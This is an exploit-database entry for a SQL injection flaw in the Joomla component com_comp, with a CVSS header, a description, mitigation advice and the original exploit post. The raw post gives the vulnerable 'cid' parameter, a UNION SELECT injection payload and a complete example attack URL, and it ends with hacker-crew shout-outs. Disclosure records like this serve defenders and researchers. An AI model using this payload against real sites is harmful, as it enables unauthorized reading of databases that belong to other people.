header-logo
Suggest Exploit
vendor:
com_comp
by:
DevilZ TM By D3v1l
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_comp
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
Unknown

Joomla Component com_comp SQL Injection

An attacker can exploit a SQL injection vulnerability in the Joomla Component com_comp by sending a maliciously crafted HTTP request to the vulnerable server. The vulnerable parameter is the 'cid' parameter which is not properly sanitized before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. An attacker can use this vulnerability to gain access to the vulnerable server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

[~]######################################### InformatioN #############################################[~]
 
[~] Title     : Joomla Component com_comp SQL Injection
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : Expl0it@DevilZTM.com
[~] Contact   : D3v1l.blackhat@yahoo.com
 
[~]#########################################   ExploiT   #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_comp&task=view&cid=[SQL]
 
[~] ExploiT         :
 
-1+UNION+SELECT+1,2--
 
[~] Example         :
 
http://127.0.0.1/index.php?option=com_comp&task=view&cid=-1+UNION+SELECT+1,2--


[~]######################################### ThankS To ... ############################################[~]
 
[~] Special Thanks To My Best FriendS :
 
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
 
[~] IRANIAN Young HackerZ
 
[~]#########################################   FinisH :D   #############################################[~]